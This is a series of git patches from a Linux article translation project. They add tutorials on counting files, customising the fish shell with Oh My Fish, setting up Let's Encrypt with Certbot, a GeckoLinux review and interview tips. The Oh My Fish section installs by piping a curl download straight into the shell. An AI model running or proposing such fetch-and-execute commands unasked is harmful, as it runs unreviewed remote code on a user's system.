+ * `-type` : File is of type
+ * `f` : regular file
+ * `wc` : It's a command to print newline, word, and byte counts for each file
+ * `-l` : print the newline counts
+
+
+
+**Example-6 :** To print the count of directories and files using the tree command (excluding hidden files).
+```
+# tree | tail -1
+2 directories, 5 files
+
+```
+
+**Example-7 :** To print the count of directories and files using the tree command, including hidden files.
+```
+# tree -a | tail -1
+2 directories, 7 files
+
+```
+
+**Example-8 :** Run the below command to count directories recursively, including hidden directories.
+```
+# find . -type d | wc -l
+3
+
+```
+
+**Example-9 :** To count the number of files based on file extension. Here we are going to count `.txt` files.
+```
+# find . -name "*.txt" | wc -l
+7
+
+```
+
+**Example-10 :** Count all files in the current directory by using the echo command in combination with the wc command. `4` indicates the number of files in the current directory.
+```
+# echo core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md README.md sign.md 选题模板.txt 中文排版指北.md | wc
+1 4 39
+
+```
+
+**Example-11 :** Count all directories in the current directory by using the echo command in combination with the wc command. `1` indicates the number of directories in the current directory.
+```
+# echo comic/ published/ sources/ translated/ | wc
+1 1 6
+
+```
+
+**Example-12 :** Count all files and directories in the current directory by using the echo command in combination with the wc command. `5` indicates the number of files and directories in the current directory.
+```
+# echo * | wc
+1 5 44
+
+```
+
+**Example-13 :** To count the number of files on the entire system:
+```
+# find / -type f | wc -l
+69769
+
+```
+
+**Example-14 :** To count the number of directories on the entire system:
+```
+# find / -type d | wc -l
+8819
+
+```
+
+**Example-15 :** Run the following command to count the number of files, folders, hardlinks, and symlinks on the entire system:
+```
+# find / -type d -exec echo dirs \; -o -type l -exec echo symlinks \; -o -type f -links +1 -exec echo hardlinks \; -o -type f -exec echo files \; | sort | uniq -c
+ 8779 dirs
+ 69343 files
+ 20 hardlinks
+ 11646 symlinks
+
+```
+
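+System-wide scans like the ones above descend into every mounted filesystem, including virtual ones such as /proc and /sys. If you only want to count files on the root filesystem itself, a hedged variant using find's `-xdev` option (the count will vary per system) would be:
+```
+# find / -xdev -type f | wc -l
+
+```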
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/how-to-count-the-number-of-files-and-folders-directories-in-linux/
+
+作者:[Magesh Maruthamuthu][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/magesh/
+[1]:https://www.2daygeek.com/empty-a-file-delete-contents-lines-from-a-file-remove-matching-string-from-a-file-remove-empty-blank-lines-from-a-file/
From 32e468360294581e5a42ec5eacd8105970011887 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:52:52 +0800
Subject: [PATCH 101/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Oh=20My=20Fish!?=
=?UTF-8?q?=20Make=20Your=20Shell=20Beautiful?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...2 Oh My Fish- Make Your Shell Beautiful.md | 253 ++++++++++++++++++
1 file changed, 253 insertions(+)
create mode 100644 sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
diff --git a/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
new file mode 100644
index 0000000000..a085692994
--- /dev/null
+++ b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
@@ -0,0 +1,253 @@
+Oh My Fish! Make Your Shell Beautiful
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/12/oh-my-fish-720x340.jpg)
+
+A few days ago, we discussed how to [**install** **Fish shell**][1], a robust, fully-usable shell that ships with many cool features out of the box such as autosuggestions, built-in search functionality, syntax highlighting, web based configuration and a lot more. Today, we are going to discuss how to make our Fish shell beautiful and elegant using **Oh My Fish** (**omf** for short). It is a Fish shell framework that allows you to install packages which extend or modify the look and feel of your shell. It is easy to use, fast and extensible. Using omf, you can easily install themes that enrich the look of your shell and plugins that tweak your fish shell as you wish.
+
+#### Install Oh My Fish
+
+Installing omf is not a big deal. All you have to do is just run the following command in your fish shell.
+```
+curl -L https://get.oh-my.fish | fish
+```
+
+[![][2]][3]
+
+Once the installation has completed, you will see that the prompt has automatically changed, as shown in the above picture. You will also notice the current time on the right of the shell window.
+
+That's it. Let us go ahead and tweak our fish shell.
+
+#### Now, Let Us Make Our Fish Shell Beautiful
+
+To list all installed packages, run:
+```
+omf list
+```
+
+This command will display both the installed themes and plugins. Please note that a package can be either a theme or plugin. Installing packages means installing themes or plugins.
+
+All official and community supported packages (both plugins and themes) are hosted in the [**main Omf repository**][4]. In it, you can see a whole bunch of repositories that contain a lot of plugins and themes.
+
+Now let us see the list of available and installed themes. To do so, run:
+```
+omf theme
+```
+
+[![][2]][5]
+
+As you can see, we have only one installed theme, which is the default, and a whole bunch of available themes. You can preview all available themes [**here**][6] before installing them. This page contains each theme's details, features, a sample screenshot, and which theme is suitable for whom.
+
+**Installing a new theme**
+
+Allow me to install a theme, for example the **clearance** theme - a minimalist fish shell theme for people who use git a lot. To do so, run:
+```
+omf install clearance
+```
+
+[![][2]][7]
+
+As you can see in the above picture, the look of the fish prompt changed immediately after installing the new theme.
+
+Let me browse through the file system and see how it looks.
+
+[![][2]][8]
+
+Not bad! It is a really simple theme. It distinguishes the current working directory, folders and files with different colors. As you may notice, it also displays the current working directory on top of the prompt. Currently, **clearance** is my default theme.
+
+**Changing theme**
+
+Like I already said, the theme will be applied immediately after installing it. If you have more than one theme, you can switch to a different theme using the following command:
+```
+omf theme
+```
+
+Example:
+```
+omf theme agnoster
+```
+
+Now I am using "agnoster" theme. Here is how agnoster theme changed the look of my shell.
+
+[![][2]][9]
+
+**Installing Plugins**
+
+For instance, I am going to install the weather plugin. To do so, just run:
+```
+omf install weather
+```
+
+The weather plugin depends on [jq][10], so you might need to install jq as well. It is available in the default repositories of most Linux distros, so you can install it using your default package manager. For example, the following command will install jq on Arch Linux and its variants.
+```
+sudo pacman -S jq
+```
+
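+On other distributions the package name is also jq; for instance, on Debian/Ubuntu or Fedora the install step would presumably be:
+```
+# Debian/Ubuntu
+sudo apt install jq
+# Fedora
+sudo dnf install jq
+```
+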
+Now, check the weather from your fish shell using the following command:
+```
+weather
+```
+
+[![][2]][11]
+
+**Searching packages**
+
+To search for a theme or plugin, do:
+```
+omf search
+```
+
+Example:
+```
+omf search nvm
+```
+
+To limit the search to themes, use **-t** flag.
+```
+ omf search -t chain
+```
+
+This command will only search for themes that contain the string "chain".
+
+To limit the search to plugins, use **-p** flag.
+```
+ omf search -p emacs
+```
+
+**Updating packages**
+
+To update only the core (omf itself), run:
+```
+omf update omf
+```
+
+If it is up-to-date, you would see the following output:
+```
+Oh My Fish is up to date.
+You are now using Oh My Fish version 6.
+Updating https://github.com/oh-my-fish/packages-main master... Done!
+```
+
+To update all packages:
+```
+omf update
+```
+
+To selectively update packages, just include the package names as shown below.
+```
+omf update clearance agnoster
+```
+
+**Displaying information about a package**
+
+When you want to know the information about a theme or plugin, use this command:
+```
+omf describe clearance
+```
+
+This command will show the information about a package.
+```
+Package: clearance
+Description: A minimalist fish shell theme for people who use git
+Repository: https://github.com/oh-my-fish/theme-clearance
+Maintainer:
+```
+
+**Removing packages**
+
+To remove a package, for example emacs, run:
+```
+omf remove emacs
+```
+
+**Managing Repositories**
+
+By default, the official repository is added automatically when you install Oh My Fish. This repository contains all packages built by the developers. To manage user-installed package repositories, use this command:
+```
+omf repositories [list|add|remove]
+```
+
+To list installed repositories, run:
+```
+omf repositories list
+```
+
+To add a repository:
+```
+omf repositories add
+```
+
+Example:
+```
+omf repositories add https://github.com/ostechnix/theme-sk
+```
+
+To remove a repository:
+```
+omf repositories remove
+```
+
+**Troubleshooting Oh My Fish**
+
+Omf is smart enough to help you if things go wrong. It will list what to do to fix an issue. For example, I removed and reinstalled the clearance package and got a file-conflict error. Luckily, Oh My Fish instructed me what to do before continuing. So, I simply ran the following to find out how to fix the error:
+```
+omf doctor
+```
+
+And I fixed the error by running the suggested command:
+```
+rm ~/.config/fish/functions/fish_prompt.fish
+```
+
+[![][2]][12]
+
+Whenever you run into a problem, just run the 'omf doctor' command and try the suggested workarounds.
+
+**Getting help**
+
+To display help section, run:
+```
+omf -h
+```
+
+Or,
+```
+omf --help
+```
+
+**Uninstalling Oh My Fish**
+
+To uninstall Oh My Fish, run this command:
+```
+omf destroy
+```
+
+Go ahead and start customizing your fish shell. For more details, refer to the project's GitHub page.
+
+That's all for now folks. I will be soon here with another interesting guide. Until then, stay tuned with OSTechNix!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+via: https://www.ostechnix.com/oh-fish-make-shell-beautiful/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-1-1.png ()
+[4]:https://github.com/oh-my-fish
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-5.png ()
+[6]:https://github.com/oh-my-fish/oh-my-fish/blob/master/docs/Themes.md
+[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-3.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-4.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-6.png ()
+[10]:https://stedolan.github.io/jq/
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-7.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-8.png ()
From 6d4ca8abc6e1301850a4a1ff2c461d12d2569980 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:55:13 +0800
Subject: [PATCH 102/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20GeckoLinux=20Brin?=
=?UTF-8?q?gs=20Flexibility=20and=20Choice=20to=20openSUSE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ings Flexibility and Choice to openSUSE.md | 109 ++++++++++++++++++
1 file changed, 109 insertions(+)
create mode 100644 sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
diff --git a/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
new file mode 100644
index 0000000000..a4e8d9657e
--- /dev/null
+++ b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
@@ -0,0 +1,109 @@
+GeckoLinux Brings Flexibility and Choice to openSUSE
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko-linux.jpg?itok=bjKVnW1q)
+I've been a fan of SUSE and openSUSE for a long time. I've always wanted to call myself an openSUSE user, but things seemed to get in the way--mostly [Elementary OS][1]. But every time an openSUSE spin is released, I take notice. Most recently, I was made aware of [GeckoLinux][2]--a unique take (offering both Static and Rolling releases) that offers a few options that openSUSE does not. Consider this list of features:
+
+ * Live DVD / USB image
+
+ * Editions for the following desktops: Cinnamon, XFCE, GNOME, Plasma, Mate, Budgie, LXQt, Barebones
+
+ * Plenty of pre-installed open source desktop programs and proprietary media codecs
+
+ * Beautiful font rendering configured out of the box
+
+ * Advanced Power Management ([TLP][3]) pre-installed
+
+ * Large amount of software available in the preconfigured repositories (preferring packages from the Packman repo--when available)
+
+ * Based on openSUSE (with no repackaging or modification of packages)
+
+ * Desktop programs can be uninstalled, along with all of their dependencies (whereas openSUSE's patterns often cause uninstalled packages to be re-installed automatically)
+
+ * Does not force the installation of additional recommended packages after initial installation (whereas openSUSE pre-installs patterns that automatically install recommended package dependencies the first time the package manager is used)
+
+
+
+
+The choice of desktops alone makes for an intriguing proposition. Keeping a cleaner, lighter system is also something that would appeal to many users--especially in light of laptops running smaller, more efficient solid state drives.
+
+Let's dig into GeckoLinux and see if it might be your next Linux distribution.
+
+### Installation
+
+I don't want to say too much about the installation--as installing Linux has become such a no-brainer these days. I will say that GeckoLinux has streamlined the process to an impressive level. The installation of GeckoLinux took about three minutes total (granted, I am running it as a virtual machine on a beast of a host--so resources were not an issue). The difference between installing GeckoLinux and openSUSE Tumbleweed was significant. Whereas GeckoLinux installed in single-digit minutes, openSUSE took more than 10 minutes to install. Relatively speaking, that's still not long. But we're picking at nits here, so that amount of time should be noted.
+
+The only hiccup to the installation was the live distro asking for a password for the live user. The live username is linux and the password is, as you probably already guessed, linux. That same password is also used for admin tasks (such as running the installer).
+
+You will also note that there are two icons on the desktop--one to install the OS and another to install language packs. Run the OS installer. Once the installation is complete--and you've booted into your desktop--you can then run the Language installer (if you need the Language packs--Figure 1).
+
+
+![GeckoLinux ][5]
+
+Figure 1: Clearly, I chose the GNOME desktop for testing purposes.
+
+[Used with permission][6]
+
+After the Language installer finished, you can then remove the installer icon from the desktop by right-clicking it and selecting Move to Trash.
+
+### Those fonts
+
+The developer claims beautiful font rendering out of the box. In fact, the developer makes this very statement:
+
+GeckoLinux comes preconfigured with what many would consider to be good font rendering, whereas many users find openSUSE's default font configuration to be less than desirable.
+
+Take a glance at Figure 2. Here you see a side-by-side comparison of openSUSE (on the left) and GeckoLinux (on the right). The difference is very subtle, but GeckoLinux does, in fact, best openSUSE out of the box. It's cleaner and easier to read. The developer's claims are dead on. Although openSUSE does a very good job of rendering fonts out of the box, GeckoLinux improves on that enough to make a difference. In fact, I'd say it's some of the cleanest (out of the box) looking fonts I've seen on a Linux distribution.
+
+
+![openSUSE][8]
+
+Figure 2: openSUSE on the left, GeckoLinux on the right.
+
+[Used with permission][6]
+
+I've worked with distributions that don't render fonts well. After hours of writing, those fonts tend to put a strain on my eyes. For anyone who spends a good amount of time staring at words, well-rendered fonts can make the difference between having eye strain and not. The openSUSE font rendering is just slightly blurrier than that of GeckoLinux. That matters.
+
+### Installed applications
+
+GeckoLinux does exactly what it claims--installs just what you need. After a complete installation (no post-install upgrading), GeckoLinux comes in at 1.5GB installed. On the other hand, openSUSE's post-install footprint is 4.3GB. In defense of openSUSE, it does install things like GNOME Games, Evolution, GIMP, and more--so much of that space is taken up with added software and dependencies. But if you're looking for a lighter weight take on openSUSE, GeckoLinux is your OS.
+
+GeckoLinux does come pre-installed with a couple of nice additions--namely the [Clementine][9] audio player (a favorite of mine), [Thunderbird][10] (instead of Evolution), PulseAudio Volume Control (a must for audio power users), Qt Configuration, GParted, [Pidgin][11], and [VLC][12].
+
+If you're a developer, you won't find much in the way of development tools on GeckoLinux. But that's no different than openSUSE (even the make command is missing on both). Naturally, all the developer tools you need (to work on Linux) are available to install, either from the command line or from within YaST2.
+
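+For example, pulling in a basic toolchain from the command line should be a one-liner; a sketch, assuming the standard openSUSE package names:
+```
+sudo zypper install gcc make git
+```
+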
+### Performance
+
+Between openSUSE and GeckoLinux, there is very little noticeable difference in performance. Opening Firefox on both resulted in maybe a second or two of variation (in favor of GeckoLinux). It should be noted, however, that the installed Firefox on both was quite out of date (52 on GeckoLinux and 53 on openSUSE). Even after a full upgrade on both platforms, Firefox was still listed at release 52 on GeckoLinux, whereas openSUSE did pick up Firefox 57. After downloading the [Firefox Quantum][13] package on GeckoLinux, the application opened immediately--completely blowing away the out of the box experiences on both openSUSE and GeckoLinux. So the first thing you will want to do is get Firefox upgraded to 57.
+
+If you're hoping for a significant performance increase over openSUSE, look elsewhere. If you're accustomed to the performance of openSUSE (it not being the sprightliest of platforms), you'll feel right at home with GeckoLinux.
+
+### The conclusion
+
+If you're looking for an excuse to venture back into the realm of openSUSE, GeckoLinux might be a good reason. It's slightly better looking, lighter weight, and with similar performance. It's not perfect and, chances are, it won't steal you away from your distribution of choice, but GeckoLinux is a solid entry in the realm of Linux desktops.
+
+Learn more about Linux through the free ["Introduction to Linux"][14] course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2017/12/geckolinux-brings-flexibility-and-choice-opensuse
+
+作者:[Jack Wallen][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/jlwallen
+[1]:https://elementary.io/
+[2]:https://geckolinux.github.io/
+[3]:https://github.com/linrunner/TLP
+[4]:/files/images/gecko1jpg
+[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko_1.jpg?itok=qTvEsSQ1 (GeckoLinux)
+[6]:/licenses/category/used-permission
+[7]:/files/images/gecko2jpg
+[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko_2.jpg?itok=AKv0x7_J (openSUSE)
+[9]:https://www.clementine-player.org/
+[10]:https://www.mozilla.org/en-US/thunderbird/
+[11]:https://www.pidgin.im/
+[12]:https://www.videolan.org/vlc/index.html
+[13]:https://www.mozilla.org/en-US/firefox/
+[14]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From af3f6b23922f2e41eab1a94818009ccf372ecaef Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:59:19 +0800
Subject: [PATCH 103/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Create=20a=20free?=
=?UTF-8?q?=20Apache=20SSL=20certificate=20with=20Let=E2=80=99s=20Encrypt?=
=?UTF-8?q?=20on=20CentOS=20&=20RHEL?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ate with Let-s Encrypt on CentOS - RHEL.md | 114 ++++++++++++++++++
1 file changed, 114 insertions(+)
create mode 100644 sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
diff --git a/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
new file mode 100644
index 0000000000..d6a173336c
--- /dev/null
+++ b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
@@ -0,0 +1,114 @@
+Create a free Apache SSL certificate with Let’s Encrypt on CentOS & RHEL
+======
+Let's Encrypt is a free, automated & open certificate authority that is supported by the ISRG (Internet Security Research Group). Let's Encrypt provides X.509 certificates for TLS (Transport Layer Security) encryption via an automated process that includes creation, validation, signing, installation, and renewal of certificates for secure websites.
+
+In this tutorial, we are going to discuss how to create a free Apache SSL certificate with Let's Encrypt on CentOS/RHEL 6 & 7. To automate the Let's Encrypt process, we will use the ACME client recommended by Let's Encrypt, i.e. Certbot; there are other ACME clients as well, but we will be using Certbot only.
+
+Certbot can automate certificate issuance and installation with no downtime; it automatically enables HTTPS on your website. It also has expert modes for people who don't want auto-configuration. It's easy to use, works on many operating systems, and has great documentation.
+
+ **(Recommended Read:[Complete guide for Apache TOMCAT installation on Linux][1])**
+
+Let's start with the prerequisites for creating an Apache SSL certificate with Let's Encrypt on CentOS/RHEL 6 & 7.
+
+
+## Pre-requisites
+
+ **1-** Obviously, we will need the Apache server to be installed on our machine. We can install it with the following command,
+
+ **# yum install httpd**
+
+For a detailed Apache installation procedure, refer to our article [**Step by Step guide to configure APACHE server**][2].
+
+ **2-** mod_ssl should also be installed on the system. Install it using the following command,
+
+ **# yum install mod_ssl**
+
+ **3-** The EPEL repositories should be installed & enabled. They are required because not all the dependencies can be resolved with the default repos. Install them using the following command,
+
+ **RHEL/CentOS 7**
+
+ **# rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/packages/e/epel-release-7-11.noarch.rpm**
+
+ **RHEL/CentOS 6 (64 Bit)**
+
+ **# rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm**
+
+ **RHEL/CentOS 6 (32 Bit)**
+
+ **# rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm**
+
+Now let's start with the procedure to install Let's Encrypt on CentOS/RHEL 7.
+
+## Let's Encrypt on CentOS/RHEL 7
+
+Installation on CentOS 7 can easily be performed with yum, using the following command,
+
+ **$ yum install certbot-apache**
+
+Once installed, we can now create the SSL certificate with the following command,
+
+ **$ certbot --apache**
+
+Now just follow the on-screen instructions to generate the certificate. During the setup, you will also be asked whether to enforce HTTPS or to keep plain HTTP; select whichever you like. If you enforce HTTPS, then all the changes required to use HTTPS will be made by the certbot setup; otherwise we will have to make the changes on our own.
+
+We can also generate certificates for multiple websites with a single command,
+
+ **$ certbot --apache -d example.com -d test.com**
+
+We can also opt to create the certificate only, without automatically making changes to any configuration files, with the following command,
+
+ **$ certbot certonly --apache**
+
+Certbot issues SSL certificates with 90 days of validity, so we need to renew the certificates before that period is over. The ideal time to renew a certificate is at around 60 days. Run the following command to renew the certificate,
+
+ **$ certbot renew**
+
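+Before relying on automatic renewal, it is worth testing the renewal path first. Assuming your Certbot version supports it, a dry run exercises the whole process against the staging environment without installing real certificates:
+```
+$ certbot renew --dry-run
+```
+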
+We can also automate the renewal process with a crontab job. Open the crontab & create a job,
+
+ **$ crontab -e**
+
+ **0 0 1 * * /usr/bin/certbot renew >> /var/log/letsencrypt.log**
+
+This job will renew your certificate on the 1st of every month at 12 AM.
+
+## Let's Encrypt on CentOS 6
+
+There are no certbot packages for CentOS 6, but that does not mean we can't make use of Let's Encrypt on CentOS/RHEL 6; instead, we can use the certbot-auto script for creating/renewing the certificates. Download the script with the following commands,
+
+ **# wget https://dl.eff.org/certbot-auto**
+
+ **# chmod a+x certbot-auto**
+
+Now we can use it in the same way as the commands for CentOS 7, but instead of certbot, we will use the script. To create a new certificate,
+
+ **# sh path/certbot-auto --apache -d example.com**
+
+To create only the certificate, use
+
+ **# sh path/certbot-auto certonly --apache**
+
+To renew the certificate, use
+
+ **# sh path/certbot-auto renew**
+
+For creating a cron job, use
+
+ **# crontab -e**
+
+ **0 0 1 * * sh path/certbot-auto renew >> /var/log/letsencrypt.log**
+
+This was our tutorial on how to install and use Let's Encrypt on CentOS/RHEL 6 & 7 to create a free SSL certificate for Apache servers. Please do leave your questions or queries down below.
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/create-free-apache-ssl-certificate-lets-encrypt-on-centos-rhel/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/complete-guide-apache-tomcat-installation-linux/
+[2]:http://linuxtechlab.com/beginner-guide-configure-apache/
From f87745aa289ac5fcd4a2d7c5615d40408934b467 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 18:01:14 +0800
Subject: [PATCH 104/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=203=20Essential=20Q?=
=?UTF-8?q?uestions=20to=20Ask=20at=20Your=20Next=20Tech=20Interview?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ions to Ask at Your Next Tech Interview.md | 43 +++++++++++++++++++
1 file changed, 43 insertions(+)
create mode 100644 sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
diff --git a/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
new file mode 100644
index 0000000000..7f90ef282d
--- /dev/null
+++ b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
@@ -0,0 +1,43 @@
+3 Essential Questions to Ask at Your Next Tech Interview
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/os-jobs_0.jpg?itok=nDf5j7xC)
+
+The annual [Open Source Jobs Report][1] from Dice and The Linux Foundation reveals a lot about prospects for open source professionals and hiring activity in the year ahead. In this year's report, 86 percent of tech professionals said that knowing open source has advanced their careers. Yet what happens with all that experience when it comes time to advance within their own organization or apply for a new role elsewhere?
+
+Interviewing for a new job is never easy. Aside from the complexities of juggling your current work while preparing for a new role, there's the added pressure of coming up with the necessary response when the interviewer asks "Do you have any questions for me?"
+
+At Dice, we're in the business of careers, advice, and connecting tech professionals with employers. But we also hire tech talent at our organization to work on open source projects. In fact, the Dice platform is based on a number of Linux distributions and we leverage open source databases as the basis for our search functionality. In short, we couldn't run Dice without open source software, therefore it's vital that we hire professionals who understand, and love, open source.
+
+Over the years, I've learned the importance of asking good questions during an interview. It's an opportunity to learn about your potential new employer, as well as better understand if they are a good match for your skills.
+
+Here are three essential questions to ask and the reason they're important:
+
+**1\. What is the company's position on employees contributing to open source projects or writing code in their spare time?**
+
+The answer to this question will tell you a lot about the company you're interviewing with. In general, companies will want tech pros who contribute to websites or projects as long as they don't conflict with the work you're doing at that firm. Allowing contributions outside the company also fosters an entrepreneurial spirit in the tech organization, and teaches tech skills that you may not otherwise get in the normal course of your day.
+
+**2\. How are projects prioritized here?**
+
+As all companies have become tech companies, there is often a division between innovative customer-facing tech projects and those that improve the platform itself. Will you be working on keeping the existing platform up to date? Or working on new products for the public? Depending on where your interests lie, the answer could determine if the company is the right fit for you.
+
+**3\. Who primarily makes decisions on new products and how much input do developers have in the decision-making process?**
+
+This question is one part understanding who is responsible for innovation at the company (and how closely you'll be working with him/her) and one part discovering your career path at the firm. A good company will talk to its developers and open source talent ahead of developing new products. It seems like a no-brainer, but it's a step that's sometimes missed and can mean the difference between a collaborative environment and a chaotic process ahead of new product releases.
+
+Interviewing can be stressful; however, as 58 percent of companies tell Dice and The Linux Foundation that they need to hire open source talent in the months ahead, it's important to remember that the heightened demand puts professionals like you in the driver's seat. Steer your career in the direction you desire.
+
+[Download][2] the full 2017 Open Source Jobs Report now.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/os-jobs/2017/12/3-essential-questions-ask-your-next-tech-interview
+
+作者:[Brian Hostetter][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/brianhostetter
+[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/
+[2]:http://bit.ly/2017OSSjobsreport
From 7faacd0728be36875f184e350f390c30324dc78c Mon Sep 17 00:00:00 2001
From: datastruct
Date: Sat, 6 Jan 2018 18:57:43 +0800
Subject: [PATCH 105/371] Update 20171214 How to Install Moodle on Ubuntu
16.04.md
---
sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 8cd5d5fdd8..9a6a2e9a98 100644
--- a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,3 +1,5 @@
+Translating by stevenzdg988
+
How to Install Moodle on Ubuntu 16.04
======
![How to Install Moodle on Ubuntu 16.04][1]
From e0cd85702e6e2771e9228d002f6ad1b3f1eb0628 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Sat, 6 Jan 2018 21:51:06 +0800
Subject: [PATCH 106/371] Fix image links and rebuild file format
---
...ogle Drive And Download 10 Times Faster.md | 45 +++++++++++++++----
1 file changed, 37 insertions(+), 8 deletions(-)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
index bf28c77328..7105b9fb8c 100644
--- a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -1,8 +1,10 @@
# 直接保存文件至 Google Drive 并用十倍的速度下载回来
+![][image-1]
+
最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
-[downloading miui update from chorme](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+[使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
@@ -16,34 +18,61 @@
### *第二步*
前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
-[savetodrive to save files to cloud drive](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+[savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
